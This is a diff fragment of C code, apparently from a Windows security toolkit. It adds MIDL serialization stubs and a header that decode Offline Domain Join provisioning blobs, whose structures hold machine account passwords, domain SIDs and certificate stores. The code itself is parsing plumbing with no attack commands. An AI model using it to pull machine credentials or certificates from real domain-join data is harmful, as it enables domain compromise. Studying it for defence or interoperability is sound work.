const MIDL_STUB_DESC ODJ_StubDesc = { (void*)&ODJ___RpcClientInterface, MIDL_user_allocate, MIDL_user_free, &ODJ__MIDL_AutoBindHandle, 0, 0, 0, 0, ms2Dodj__MIDL_TypeFormatString, 1, 0x60000, 0, 0x8000253, 0, 0, 0, 0x1, 0, 0, 0 };
size_t PODJ_PROVISION_DATA_AlignSize(handle_t _MidlEsHandle, PODJ_PROVISION_DATA* _pType)
{
return NdrMesTypeAlignSize2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + ODJ_PROVISION_DATA_Offset, _pType);
}
void PODJ_PROVISION_DATA_Encode(handle_t _MidlEsHandle, PODJ_PROVISION_DATA* _pType)
{
NdrMesTypeEncode2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + ODJ_PROVISION_DATA_Offset, _pType);
}
void PODJ_PROVISION_DATA_Decode(handle_t _MidlEsHandle, PODJ_PROVISION_DATA* _pType)
{
NdrMesTypeDecode2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + ODJ_PROVISION_DATA_Offset, _pType);
}
void PODJ_PROVISION_DATA_Free(handle_t _MidlEsHandle, PODJ_PROVISION_DATA* _pType)
{
NdrMesTypeFree2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + ODJ_PROVISION_DATA_Offset, _pType);
}
size_t POP_PACKAGE_PART_AlignSize(handle_t _MidlEsHandle, POP_PACKAGE_PART* _pType)
{
return NdrMesTypeAlignSize2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_PACKAGE_PART_Offset, _pType);
}
void POP_PACKAGE_PART_Encode(handle_t _MidlEsHandle, POP_PACKAGE_PART* _pType)
{
NdrMesTypeEncode2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_PACKAGE_PART_Offset, _pType);
}
void POP_PACKAGE_PART_Decode(handle_t _MidlEsHandle, POP_PACKAGE_PART* _pType)
{
NdrMesTypeDecode2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_PACKAGE_PART_Offset, _pType);
}
void POP_PACKAGE_PART_Free(handle_t _MidlEsHandle, POP_PACKAGE_PART* _pType)
{
NdrMesTypeFree2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_PACKAGE_PART_Offset, _pType);
}
size_t POP_PACKAGE_PART_COLLECTION_AlignSize(handle_t _MidlEsHandle, POP_PACKAGE_PART_COLLECTION* _pType)
{
return NdrMesTypeAlignSize2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_PACKAGE_PART_COLLECTION_Offset, _pType);
}
void POP_PACKAGE_PART_COLLECTION_Encode(handle_t _MidlEsHandle, POP_PACKAGE_PART_COLLECTION* _pType)
{
NdrMesTypeEncode2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_PACKAGE_PART_COLLECTION_Offset, _pType);
}
void POP_PACKAGE_PART_COLLECTION_Decode(handle_t _MidlEsHandle, POP_PACKAGE_PART_COLLECTION* _pType)
{
NdrMesTypeDecode2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_PACKAGE_PART_COLLECTION_Offset, _pType);
}
void POP_PACKAGE_PART_COLLECTION_Free(handle_t _MidlEsHandle, POP_PACKAGE_PART_COLLECTION* _pType)
{
NdrMesTypeFree2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_PACKAGE_PART_COLLECTION_Offset, _pType);
}
size_t POP_PACKAGE_AlignSize(handle_t _MidlEsHandle, POP_PACKAGE* _pType)
{
return NdrMesTypeAlignSize2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_PACKAGE_Offset, _pType);
}
void POP_PACKAGE_Encode(handle_t _MidlEsHandle, POP_PACKAGE* _pType)
{
NdrMesTypeEncode2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_PACKAGE_Offset, _pType);
}
void POP_PACKAGE_Decode(handle_t _MidlEsHandle, POP_PACKAGE* _pType)
{
NdrMesTypeDecode2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_PACKAGE_Offset, _pType);
}
void POP_PACKAGE_Free(handle_t _MidlEsHandle, POP_PACKAGE* _pType)
{
NdrMesTypeFree2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_PACKAGE_Offset, _pType);
}
size_t PODJ_WIN7BLOB_AlignSize(handle_t _MidlEsHandle, PODJ_WIN7BLOB* _pType)
{
return NdrMesTypeAlignSize2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + ODJ_WIN7BLOB_Offset, _pType);
}
void PODJ_WIN7BLOB_Encode(handle_t _MidlEsHandle, PODJ_WIN7BLOB* _pType)
{
NdrMesTypeEncode2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + ODJ_WIN7BLOB_Offset, _pType);
}
void PODJ_WIN7BLOB_Decode(handle_t _MidlEsHandle, PODJ_WIN7BLOB* _pType)
{
NdrMesTypeDecode2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + ODJ_WIN7BLOB_Offset, _pType);
}
void PODJ_WIN7BLOB_Free(handle_t _MidlEsHandle, PODJ_WIN7BLOB* _pType)
{
NdrMesTypeFree2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + ODJ_WIN7BLOB_Offset, _pType);
}
size_t POP_JOINPROV2_PART_AlignSize(handle_t _MidlEsHandle, POP_JOINPROV2_PART* _pType)
{
return NdrMesTypeAlignSize2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_JOINPROV2_PART_Offset, _pType);
}
void POP_JOINPROV2_PART_Encode(handle_t _MidlEsHandle, POP_JOINPROV2_PART* _pType)
{
NdrMesTypeEncode2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_JOINPROV2_PART_Offset, _pType);
}
void POP_JOINPROV2_PART_Decode(handle_t _MidlEsHandle, POP_JOINPROV2_PART* _pType)
{
NdrMesTypeDecode2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_JOINPROV2_PART_Offset, _pType);
}
void POP_JOINPROV2_PART_Free(handle_t _MidlEsHandle, POP_JOINPROV2_PART* _pType)
{
NdrMesTypeFree2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_JOINPROV2_PART_Offset, _pType);
}
size_t POP_JOINPROV3_PART_AlignSize(handle_t _MidlEsHandle, POP_JOINPROV3_PART* _pType)
{
return NdrMesTypeAlignSize2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_JOINPROV3_PART_Offset, _pType);
}
void POP_JOINPROV3_PART_Encode(handle_t _MidlEsHandle, POP_JOINPROV3_PART* _pType)
{
NdrMesTypeEncode2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_JOINPROV3_PART_Offset, _pType);
}
void POP_JOINPROV3_PART_Decode(handle_t _MidlEsHandle, POP_JOINPROV3_PART* _pType)
{
NdrMesTypeDecode2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_JOINPROV3_PART_Offset, _pType);
}
void POP_JOINPROV3_PART_Free(handle_t _MidlEsHandle, POP_JOINPROV3_PART* _pType)
{
NdrMesTypeFree2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_JOINPROV3_PART_Offset, _pType);
}
size_t POP_POLICY_PART_AlignSize(handle_t _MidlEsHandle, POP_POLICY_PART* _pType)
{
return NdrMesTypeAlignSize2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_POLICY_PART_Offset, _pType);
}
void POP_POLICY_PART_Encode(handle_t _MidlEsHandle, POP_POLICY_PART* _pType)
{
NdrMesTypeEncode2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_POLICY_PART_Offset, _pType);
}
void POP_POLICY_PART_Decode(handle_t _MidlEsHandle, POP_POLICY_PART* _pType)
{
NdrMesTypeDecode2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_POLICY_PART_Offset, _pType);
}
void POP_POLICY_PART_Free(handle_t _MidlEsHandle, POP_POLICY_PART* _pType)
{
NdrMesTypeFree2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_POLICY_PART_Offset, _pType);
}
size_t POP_CERT_PART_AlignSize(handle_t _MidlEsHandle, POP_CERT_PART* _pType)
{
return NdrMesTypeAlignSize2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_CERT_PART_Offset, _pType);
}
void POP_CERT_PART_Encode(handle_t _MidlEsHandle, POP_CERT_PART* _pType)
{
NdrMesTypeEncode2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_CERT_PART_Offset, _pType);
}
void POP_CERT_PART_Decode(handle_t _MidlEsHandle, POP_CERT_PART* _pType)
{
NdrMesTypeDecode2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_CERT_PART_Offset, _pType);
}
void POP_CERT_PART_Free(handle_t _MidlEsHandle, POP_CERT_PART* _pType)
{
NdrMesTypeFree2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_CERT_PART_Offset, _pType);
}

211
modules/rpc/kull_m_rpc_ms-odj.h Normal file
View File

@ -0,0 +1,211 @@
#pragma once
#include "kull_m_rpc.h"
#include <dsgetdc.h>
extern const GUID GUID_JOIN_PROVIDER, GUID_JOIN_PROVIDER2, GUID_JOIN_PROVIDER3, GUID_CERT_PROVIDER, GUID_POLICY_PROVIDER;
#define ODJ_WIN7_FORMAT 0x00000001 // The bytes contained in pBlob must contain a serialized ODJ_WIN7_BLOB structure
#define ODJ_WIN8_FORMAT 0x00000002 // The bytes contained in pBlob must contain a serialized OP_PACKAGE structure
typedef struct _ODJ_BLOB {
ULONG ulODJFormat;
ULONG cbBlob;
PBYTE pBlob;
} ODJ_BLOB, * PODJ_BLOB;
typedef struct _ODJ_PROVISION_DATA {
ULONG ulVersion; // 1
ULONG ulcBlobs;
PODJ_BLOB pBlobs;
} ODJ_PROVISION_DATA, * PODJ_PROVISION_DATA;
typedef struct _OP_BLOB {
ULONG cbBlob;
PBYTE pBlob;
} OP_BLOB, * POP_BLOB;
/* PartType
GUID_JOIN_PROVIDER {631c7621-5289-4321-bc9e-80f843f868c3} Contains a serialized ODJ_WIN7_BLOB structure.
GUID_JOIN_PROVIDER2 {57bfc56b-52f9-480c-adcb-91b3f8a82317} Contains a serialized OP_JOIN_PROV2_PART structure.
GUID_JOIN_PROVIDER3 {fc0ccf25-7ffa-474a-8611-69ffe269645f} Contains a serialized OP_JOIN_PROV3_PART structure.
GUID_CERT_PROVIDER {9c0971e9-832f-4873-8e87-ef1419d4781e} Contains a serialized OP_CERT_PART structure.
GUID_POLICY_PROVIDER {68fb602a-0c09-48ce-b75f-07b7bd58f7ec} Contains a serialized OP_POLICY_PART structure.
*/
#define OPSPI_PACKAGE_PART_ESSENTIAL 0x00000001 // This package part is considered essential. If the consumer does not recognize this package part or fails to successfully process it, the overall operation must fail.
typedef struct _OP_PACKAGE_PART {
GUID PartType;
ULONG ulFlags;
OP_BLOB Part;
OP_BLOB Extension; // Reserved for future use and MUST be set to all zeros.
} OP_PACKAGE_PART, * POP_PACKAGE_PART;
typedef struct _OP_PACKAGE_PART_COLLECTION {
ULONG cParts;
POP_PACKAGE_PART pParts;
OP_BLOB Extension;
} OP_PACKAGE_PART_COLLECTION, * POP_PACKAGE_PART_COLLECTION;
typedef struct _OP_PACKAGE {
GUID EncryptionType; // Reserved for future use and MUST be set to GUID_NULL.
OP_BLOB EncryptionContext; // Reserved for future use and MUST be set to all zeros.
OP_BLOB WrappedPartCollection; // An OP_BLOB structure that contains a serialized OP_PACKAGE_COLLECTION structure.
ULONG cbDecryptedPartCollection; // Reserved for future use and MUST be set to zero.
OP_BLOB Extension; // Reserved for future use and MUST be set to all zeros.
} OP_PACKAGE, * POP_PACKAGE;
typedef struct _ODJ_SID {
UCHAR Revision;
UCHAR SubAuthorityCount;
SID_IDENTIFIER_AUTHORITY IdentifierAuthority;
ULONG SubAuthority[ANYSIZE_ARRAY];
} ODJ_SID, * PODJ_SID;
typedef struct _ODJ_UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} ODJ_UNICODE_STRING, * PODJ_UNICODE_STRING;
typedef struct _ODJ_POLICY_DNS_DOMAIN_INFO {
ODJ_UNICODE_STRING Name;
ODJ_UNICODE_STRING DnsDomainName;
ODJ_UNICODE_STRING DnsForestName;
GUID DomainGuid;
PODJ_SID Sid;
} ODJ_POLICY_DNS_DOMAIN_INFO;
typedef struct _ODJ_WIN7BLOB {
wchar_t* lpDomain;
wchar_t* lpMachineName;
wchar_t* lpMachinePassword;
ODJ_POLICY_DNS_DOMAIN_INFO DnsDomainInfo;
DOMAIN_CONTROLLER_INFOW DcInfo;
DWORD Options;
} ODJ_WIN7BLOB, * PODJ_WIN7BLOB;
#define OP_JP2_FLAG_PERSISTENTSITE 0x00000001 // The site specified in lpSiteName MUST be considered the permanent site for the client.
typedef struct _OP_JOINPROV2_PART {
DWORD dwFlags;
wchar_t* lpNetbiosName;
wchar_t* lpSiteName;
wchar_t* lpPrimaryDNSDomain;
DWORD dwReserved;
wchar_t* lpReserved;
} OP_JOINPROV2_PART, * POP_JOINPROV2_PART;
typedef struct _OP_JOINPROV3_PART {
DWORD Rid;
wchar_t* lpSid;
} OP_JOINPROV3_PART, * POP_JOINPROV3_PART;
typedef struct _OP_POLICY_ELEMENT {
wchar_t* pKeyPath;
wchar_t* pValueName;
ULONG ulValueType;
ULONG cbValueData;
PBYTE pValueData;
} OP_POLICY_ELEMENT, * POP_POLICY_ELEMENT;
typedef struct _OP_POLICY_ELEMENT_LIST {
wchar_t* pSource;
ULONG ulRootKeyId; // Contains the identifier of the root registry key; currently must be set to HKEY_LOCAL_MACHINE.
ULONG cElements;
POP_POLICY_ELEMENT pElements;
} OP_POLICY_ELEMENT_LIST, * POP_POLICY_ELEMENT_LIST;
typedef struct _OP_POLICY_PART {
ULONG cElementLists;
POP_POLICY_ELEMENT_LIST pElementLists;
OP_BLOB Extension; // Reserved for future use and must contain all zeros
} OP_POLICY_PART, * POP_POLICY_PART;
typedef struct _OP_CERT_PFX_STORE {
wchar_t* pTemplateName;
ULONG ulPrivateKeyExportPolicy;
wchar_t* pPolicyServerUrl;
ULONG ulPolicyServerUrlFlags;
wchar_t* pPolicyServerId;
ULONG cbPfx;
PBYTE pPfx;
} OP_CERT_PFX_STORE, * POP_CERT_PFX_STORE;
typedef struct _OP_CERT_SST_STORE {
ULONG StoreLocation;
wchar_t* pStoreName;
ULONG cbSst;
PBYTE pSst;
} OP_CERT_SST_STORE, * POP_CERT_SST_STORE;
typedef struct _OP_CERT_PART {
ULONG cPfxStores;
POP_CERT_PFX_STORE pPfxStores;
ULONG cSstStores;
POP_CERT_SST_STORE pSstStores;
OP_BLOB Extension;
} OP_CERT_PART, * POP_CERT_PART;
size_t POP_PACKAGE_AlignSize(handle_t _MidlEsHandle, POP_PACKAGE * _pType);
size_t PODJ_WIN7BLOB_AlignSize(handle_t _MidlEsHandle, PODJ_WIN7BLOB * _pType);
size_t POP_JOINPROV2_PART_AlignSize(handle_t _MidlEsHandle, POP_JOINPROV2_PART * _pType);
size_t POP_JOINPROV3_PART_AlignSize(handle_t _MidlEsHandle, POP_JOINPROV3_PART * _pType);
size_t PODJ_PROVISION_DATA_AlignSize(handle_t _MidlEsHandle, PODJ_PROVISION_DATA * _pType);
size_t POP_PACKAGE_PART_COLLECTION_AlignSize(handle_t _MidlEsHandle, POP_PACKAGE_PART_COLLECTION * _pType);
size_t POP_PACKAGE_PART_AlignSize(handle_t _MidlEsHandle, POP_PACKAGE_PART * _pType);
size_t POP_CERT_PART_AlignSize(handle_t _MidlEsHandle, POP_CERT_PART * _pType);
size_t POP_POLICY_PART_AlignSize(handle_t _MidlEsHandle, POP_POLICY_PART * _pType);
void POP_PACKAGE_Encode(handle_t _MidlEsHandle, POP_PACKAGE * _pType);
void POP_JOINPROV3_PART_Encode(handle_t _MidlEsHandle, POP_JOINPROV3_PART * _pType);
void POP_JOINPROV2_PART_Encode(handle_t _MidlEsHandle, POP_JOINPROV2_PART * _pType);
void PODJ_WIN7BLOB_Encode(handle_t _MidlEsHandle, PODJ_WIN7BLOB * _pType);
void PODJ_PROVISION_DATA_Encode(handle_t _MidlEsHandle, PODJ_PROVISION_DATA * _pType);
void POP_PACKAGE_PART_COLLECTION_Encode(handle_t _MidlEsHandle, POP_PACKAGE_PART_COLLECTION * _pType);
void POP_PACKAGE_PART_Encode(handle_t _MidlEsHandle, POP_PACKAGE_PART * _pType);
void POP_CERT_PART_Encode(handle_t _MidlEsHandle, POP_CERT_PART * _pType);
void POP_POLICY_PART_Encode(handle_t _MidlEsHandle, POP_POLICY_PART * _pType);
void POP_PACKAGE_Decode(handle_t _MidlEsHandle, POP_PACKAGE * _pType);
void POP_JOINPROV3_PART_Decode(handle_t _MidlEsHandle, POP_JOINPROV3_PART * _pType);
void PODJ_WIN7BLOB_Decode(handle_t _MidlEsHandle, PODJ_WIN7BLOB * _pType);
void POP_JOINPROV2_PART_Decode(handle_t _MidlEsHandle, POP_JOINPROV2_PART * _pType);
void PODJ_PROVISION_DATA_Decode(handle_t _MidlEsHandle, PODJ_PROVISION_DATA * _pType);
void POP_PACKAGE_PART_Decode(handle_t _MidlEsHandle, POP_PACKAGE_PART * _pType);
void POP_PACKAGE_PART_COLLECTION_Decode(handle_t _MidlEsHandle, POP_PACKAGE_PART_COLLECTION * _pType);
void POP_CERT_PART_Decode(handle_t _MidlEsHandle, POP_CERT_PART * _pType);
void POP_POLICY_PART_Decode(handle_t _MidlEsHandle, POP_POLICY_PART * _pType);
void POP_PACKAGE_Free(handle_t _MidlEsHandle, POP_PACKAGE * _pType);
void POP_JOINPROV2_PART_Free(handle_t _MidlEsHandle, POP_JOINPROV2_PART * _pType);
void PODJ_WIN7BLOB_Free(handle_t _MidlEsHandle, PODJ_WIN7BLOB * _pType);
void POP_JOINPROV3_PART_Free(handle_t _MidlEsHandle, POP_JOINPROV3_PART * _pType);
void PODJ_PROVISION_DATA_Free(handle_t _MidlEsHandle, PODJ_PROVISION_DATA * _pType);
void POP_PACKAGE_PART_Free(handle_t _MidlEsHandle, POP_PACKAGE_PART * _pType);
void POP_PACKAGE_PART_COLLECTION_Free(handle_t _MidlEsHandle, POP_PACKAGE_PART_COLLECTION * _pType);
void POP_CERT_PART_Free(handle_t _MidlEsHandle, POP_CERT_PART * _pType);
void POP_POLICY_PART_Free(handle_t _MidlEsHandle, POP_POLICY_PART * _pType);
#define kull_m_rpc_DecodeODJ_PROVISION_DATA(/*PVOID */data, /*DWORD */size, /*PODJ_PROVISION_DATA **/pObject) kull_m_rpc_Generic_Decode(data, size, pObject, (PGENERIC_RPC_DECODE) PODJ_PROVISION_DATA_Decode)
#define kull_m_rpc_FreeODJ_PROVISION_DATA(/*PODJ_PROVISION_DATA **/pObject) kull_m_rpc_Generic_Free(pObject, (PGENERIC_RPC_FREE) PODJ_PROVISION_DATA_Free)
#define kull_m_rpc_DecodeODJ_WIN7BLOB(/*PVOID */data, /*DWORD */size, /*PODJ_WIN7BLOB **/pObject) kull_m_rpc_Generic_Decode(data, size, pObject, (PGENERIC_RPC_DECODE) PODJ_WIN7BLOB_Decode)
#define kull_m_rpc_FreeODJ_WIN7BLOB(/*PODJ_WIN7BLOB **/pObject) kull_m_rpc_Generic_Free(pObject, (PGENERIC_RPC_FREE) PODJ_WIN7BLOB_Free)
#define kull_m_rpc_DecodeOP_PACKAGE(/*PVOID */data, /*DWORD */size, /*POP_PACKAGE **/pObject) kull_m_rpc_Generic_Decode(data, size, pObject, (PGENERIC_RPC_DECODE) POP_PACKAGE_Decode)
#define kull_m_rpc_FreeOP_PACKAGE(/*POP_PACKAGE **/pObject) kull_m_rpc_Generic_Free(pObject, (PGENERIC_RPC_FREE) POP_PACKAGE_Free)
#define kull_m_rpc_DecodeOP_PACKAGE_PART_COLLECTION(/*PVOID */data, /*DWORD */size, /*POP_PACKAGE_PART_COLLECTION **/pObject) kull_m_rpc_Generic_Decode(data, size, pObject, (PGENERIC_RPC_DECODE) POP_PACKAGE_PART_COLLECTION_Decode)
#define kull_m_rpc_FreeOP_PACKAGE_PART_COLLECTION(/*POP_PACKAGE_PART_COLLECTION **/pObject) kull_m_rpc_Generic_Free(pObject, (PGENERIC_RPC_FREE) POP_PACKAGE_PART_COLLECTION_Free)
#define kull_m_rpc_DecodeOP_JOINPROV2_PART(/*PVOID */data, /*DWORD */size, /*POP_JOINPROV2_PART **/pObject) kull_m_rpc_Generic_Decode(data, size, pObject, (PGENERIC_RPC_DECODE) POP_JOINPROV2_PART_Decode)
#define kull_m_rpc_FreeOP_JOINPROV2_PART(/*POP_JOINPROV2_PART **/pObject) kull_m_rpc_Generic_Free(pObject, (PGENERIC_RPC_FREE) POP_JOINPROV2_PART_Free)
#define kull_m_rpc_DecodeOP_JOINPROV3_PART(/*PVOID */data, /*DWORD */size, /*POP_JOINPROV3_PART **/pObject) kull_m_rpc_Generic_Decode(data, size, pObject, (PGENERIC_RPC_DECODE) POP_JOINPROV3_PART_Decode)
#define kull_m_rpc_FreeOP_JOINPROV3_PART(/*POP_JOINPROV3_PART **/pObject) kull_m_rpc_Generic_Free(pObject, (PGENERIC_RPC_FREE) POP_JOINPROV3_PART_Free)
#define kull_m_rpc_DecodeOP_CERT_PART(/*PVOID */data, /*DWORD */size, /*POP_CERT_PART **/pObject) kull_m_rpc_Generic_Decode(data, size, pObject, (PGENERIC_RPC_DECODE) POP_CERT_PART_Decode)
#define kull_m_rpc_FreeOP_CERT_PART(/*POP_CERT_PART **/pObject) kull_m_rpc_Generic_Free(pObject, (PGENERIC_RPC_FREE) POP_CERT_PART_Free)
#define kull_m_rpc_DecodeOP_POLICY_PART(/*PVOID */data, /*DWORD */size, /*POP_POLICY_PART **/pObject) kull_m_rpc_Generic_Decode(data, size, pObject, (PGENERIC_RPC_DECODE) POP_POLICY_PART_Decode)
#define kull_m_rpc_FreeOP_POLICY_PART(/*POP_POLICY_PART **/pObject) kull_m_rpc_Generic_Free(pObject, (PGENERIC_RPC_FREE) POP_POLICY_PART_Free)